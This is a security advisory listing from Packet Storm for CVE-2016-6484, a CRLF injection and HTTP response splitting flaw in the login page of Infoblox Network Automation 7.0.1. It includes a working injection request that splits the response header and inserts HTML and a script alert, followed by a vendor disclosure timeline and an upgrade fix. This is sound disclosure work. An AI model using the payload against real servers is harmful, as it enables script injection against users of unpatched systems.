Lucene search

K
packetstormAlex HaynesPACKETSTORM:138615
HistorySep 07, 2016 - 12:00 a.m.

Infoblox 7.0.1 CRLF Injection / HTTP Response Splitting

2016-09-0700:00:00
Alex Haynes
packetstormsecurity.com
39

EPSS

0.001

Percentile

50.9%

`Exploit Title: [CVE-2016-6484] Infoblox Network Automation CRLF Injection/ HTTP splitting vulnerability  
Product: Infoblox Network Automation  
Vulnerable Versions: 7.0.1 and all previous versions   
Tested Version: 6.9.2  
Advisory Publication: 06/09/2016  
Vulnerability Type: [CWE-113:] Improper Neutralization of CRLF Sequences in HTTP Headers (HTTP Response Splitting)  
CVE Reference: CVE-2016-6484  
Credit: Alex Haynes  
  
Advisory Details:  
  
  
(1) Vendor & Product Description  
--------------------------------  
  
Vendor:  
Infoblox  
  
Product & Version:  
Infoblox Network Automation v7.0.1  
  
Vendor URL & Download:  
https://www.infoblox.com/products/network-automation  
  
Product Description:  
"Infoblox also offers a complementary, powerful network automation platform which enables discovery, switch port management, network change configuration and compliance management for multi-vendor network devices. Automation cuts down administrator workload and reduces risk of network outages due to improper configurations or changes."  
  
(2) Vulnerability Details:  
--------------------------  
The login page of netmri is vulnerable to a HTTP splitting/CRLF injection.   
  
https://NETMRISERVER/netmri/config/userAdmin/login.tdf  
  
The POST of the login action contains the following parameters, and the contentType parameter can be modified to be reflected in the response header:   
  
skipjackPassword=test&width=100&contentType=application/xml&msg=Please+wait+while+your+credentials+are+validated...&url=%2Fnetmri%2Fconfig%2FuserAdmin%2Flogin.tdf&mode=DO-LOGIN&skipjackUsername=test&multipartFile=&title=Waiting+For+Process&filename=&licenseFile=input.licenseFile&authServerList=192.168.X.X%2C+10.X.X.X  
  
Once we control content-type, we can inject carriage return : %0a and line feed : %0d characters to break the header and introduce our own, effectively splitting the response. We can then introduce our own HTML and/or javascript to provoke a HTML injection or cross-site scripting attack.:  
  
skipjackPassword=test&width=100&contentType=%0d%0aContentLength:%2019%0d%0a%0d%0a<html><h1>Injected HTML</h1><script>alert(xss);</script><!--</html>  
&msg=Please+wait+while+your+credentials+are+validated...&url=%2Fnetmri%2Fconfig%2FuserAdmin%2Flogin.tdf&mode=DO-LOGIN&skipjackUsername=test&multipartFile=&title=Waiting+For+Process&filename=&licenseFile=input.licenseFile&authServerList=192.168.X.X%2C+10.X.X.X  
  
  
  
(3) Advisory Timeline:  
----------------------  
25/01/2016 - First Contact informing vendor of vulnerabilities. No response.  
01/02/2016 - Follow up e-mail to inform them of vulnerabilities. Response requesting further information.  
01/02/2016 - Information on vulnerabilities sent to vendor. No response.  
08/02/2016 - follow up e-mail requesting update. Vendor responds asking us to open a support ticket.  
12/02/2016 - Infoblox products out of support so cannot raise ticket. write to vendor to explain situation. No response.  
24/02/2016 - Follow up with vendor on vulnerabilities requesting an update.  
10/03/2016 - Final follow up to vendor requesting an update. Vendor responds and opens support ticket for vulnerabilities, mentioning they will look into vulnerabilities.  
14/03/2016 - vendor responds saying they are able to reproduce vulnerabilities  
17/03/2016 - Vendor responds saying some of the vulnerabilities are already fixed in version 7.0.4 but cannot confirm which ones.  
05/04/2016 - Request update from vendor on status of vulnerabilities.  
12/04/2016 - Vendor responds saying CSRF already fixed in 7.0.1, XSS and HTTP Splitting to be fixed in upcoming 7.1.1 - expected release in summer.  
30/06/2016 - Patch 7.1.1 released  
06/09/2016 - Public disclosure  
  
  
(4)Solution:  
------------  
Upgrade to Version 7.1.1  
  
  
(5) Credits:  
------------  
Discovered by Alex Haynes  
`

EPSS

0.001

Percentile

50.9%

Related for PACKETSTORM:138615